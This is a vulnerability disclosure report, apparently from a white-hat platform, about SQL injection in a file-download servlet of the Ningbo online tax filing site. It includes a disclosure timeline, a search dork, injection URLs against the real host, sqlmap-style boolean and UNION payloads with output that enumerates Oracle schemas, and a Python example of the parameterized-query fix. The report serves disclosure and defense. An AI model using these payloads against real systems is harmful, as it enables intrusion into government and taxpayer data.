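2014-10-10: Details reported to the vendor; awaiting vendor handling
2014-10-14: Vendor confirmed; details disclosed to the vendor only
2014-10-24: Details disclosed to core white hats and experts in related fields
2014-11-03: Details disclosed to regular white hats
2014-11-13: Details disclosed to trainee white hats
2014-11-24: Details disclosed to the public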
SQL injection in the Ningbo online tax filing system
It uses https and looks secure, but through Google I stumbled on a file download endpoint. A lot of the file download code written by Java programmers has SQL injection problems.

google inurl:servlet/FileDown?fjxxId=

https://web1.nb-n-tax.gov.cn/etax/jsp/zhinan/servlet/FileDown?fjxxId=1715
https://web1.nb-n-tax.gov.cn/etax/jsp/zhinan/servlet/FileDown?fjxxId=1715%20and%201=1
https://web1.nb-n-tax.gov.cn/etax/jsp/zhinan/servlet/FileDown?fjxxId=1715%20and%201=2
Place: GET
Parameter: fjxxId
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: fjxxId=1715 AND 4057=4057

    Type: UNION query
    Title: Generic UNION query (NULL) - 11 columns
    Payload: fjxxId=-1141 UNION ALL SELECT NULL,NULL,NULL,NULL,CHR(113)||CHR(111)||CHR(99)||CHR(104)||CHR(113)||CHR(76)||CHR(67)||CHR(112)||CHR(106)||CHR(80)||CHR(86)||CHR(85)||CHR(122)||CHR(99)||CHR(102)||CHR(113)||CHR(122)||CHR(122)||CHR(102)||CHR(113),NULL,NULL,NULL,NULL,NULL,NULL FROM DUAL--
---
[21:20:50] [INFO] the back-end DBMS is Oracle
web application technology: Servlet 2.5, JSP 2.1, Apache 2.2.26
back-end DBMS: Oracle
[21:20:50] [INFO] fetching current database
[21:20:50] [WARNING] on Oracle you'll need to use schema names for enumeration as the counterpart to database names on other DBMSes
current schema (equivalent to database on Oracle): 'NSFW'
UNION queries are supported.
[21:22:04] [INFO] fetching database (schema) names
[21:22:04] [INFO] the SQL query used returns 4 entries
[21:22:04] [INFO] resumed: "NSFW"
[21:22:04] [INFO] resumed: "SYS"
[21:22:04] [INFO] resumed: "SYSTEM"
[21:22:04] [INFO] resumed: "WMSYS"
Please contact the developer, 方欣科技有限公司.
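The pattern the report describes (a download handler that builds its query from the `fjxxId` value) next to a parameterized form, as an added example that is not the tax system's code. The table, its columns, the function names and the SQLite backend are assumptions made so the example runs offline; the real system is a Java servlet on Oracle, where the equivalent fix is a JDBC `PreparedStatement` with a bound parameter.

```python
import sqlite3

def make_db():
    # Constructed sample data; table and column names are hypothetical.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE attachment (id INTEGER PRIMARY KEY, name TEXT)")
    db.executemany("INSERT INTO attachment VALUES (?, ?)",
                   [(1715, "guide.pdf"), (1716, "internal.xls")])
    return db

def lookup_vulnerable(db, fjxx_id):
    # "Before" form: request text is concatenated into the statement, so
    # anything after the number is parsed as SQL.
    sql = "SELECT name FROM attachment WHERE id = " + fjxx_id
    return [row[0] for row in db.execute(sql)]

def lookup_hardened(db, fjxx_id):
    # 1) Allow-list the shape: a short run of ASCII digits and nothing else.
    if not (fjxx_id.isascii() and fjxx_id.isdigit() and len(fjxx_id) <= 10):
        raise ValueError("fjxxId must be numeric")
    # 2) Bind the value; the driver never parses it as SQL text.
    rows = db.execute("SELECT name FROM attachment WHERE id = ?",
                      (int(fjxx_id),))
    return [row[0] for row in rows]

def differs_on_boolean_pair(lookup, db, base="1715"):
    # Regression check: a handler that answers differently for the two
    # conditions shown in the report is evaluating request text as SQL.
    def run(value):
        try:
            return lookup(db, value)
        except ValueError:
            return "rejected"
    return run(base + " and 1=1") != run(base + " and 1=2")

if __name__ == "__main__":
    db = make_db()
    print("vulnerable differs:", differs_on_boolean_pair(lookup_vulnerable, db))
    print("hardened differs:  ", differs_on_boolean_pair(lookup_hardened, db))
```

`differs_on_boolean_pair` can be kept as a regression test for every handler that takes a numeric identifier from the request.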
Severity: High
Vulnerability Rank: 10
Confirmed: 2014-10-14 18:06
None yet